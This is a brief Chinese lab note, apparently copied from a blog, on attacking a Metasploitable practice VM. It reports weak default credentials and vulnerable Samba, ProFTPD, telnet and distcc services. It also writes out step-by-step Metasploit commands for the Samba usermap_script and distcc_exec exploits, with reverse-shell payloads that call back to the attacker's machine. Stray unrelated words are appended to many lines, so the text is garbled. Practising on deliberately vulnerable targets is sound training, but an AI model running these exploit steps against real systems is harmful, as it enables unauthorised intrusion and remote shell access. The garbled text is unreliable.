漏洞測試確實是能夠的 當時把文章copy下來進行再進行測試。可是沒有copy到圖片,實驗是成功了,可是沒有那麼直觀。ubuntu
使用metasploit服務器
對metasploitable 靶服務器進行***ide
metasploitable 是ubuntu8.0的版本工具
neuss掃描到漏洞測試
139端口能夠獲取該系統主機名爲「METASPLOITABLE」,註釋「metasploitable server (Samba 3.0.20-Debian)」;unix
系統存在弱口令,用戶user、msfadmin密碼與用戶名同樣,使用net use命令可以創建鏈接查看共享資源。ftp開放版本信息 ProFTPD 1.3.1 Server (Debian),user這個用戶在ftp中也能夠使用;server
telnet服務開放,可肯定該系統爲Ubuntu 8.04,用戶user、msfadmin能夠登陸,並得到相應權限。若是不存在弱口令,經過截獲該telnet數據也能獲取用戶口令圖片
一個distcc漏洞ip
一個samba 共享服務漏洞資源
msf對靶服務器的工具
smb-samba 共享服務
use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse
set rhost (ip address)
set lhost (ip address)
exploit
use exploit/unix/misc/distcc_exec
set payload cmd/unix/reverse_perl
set rhost (ip address)
set lhost (ip address)
exploit
distcc 成功 可是沒有root的權限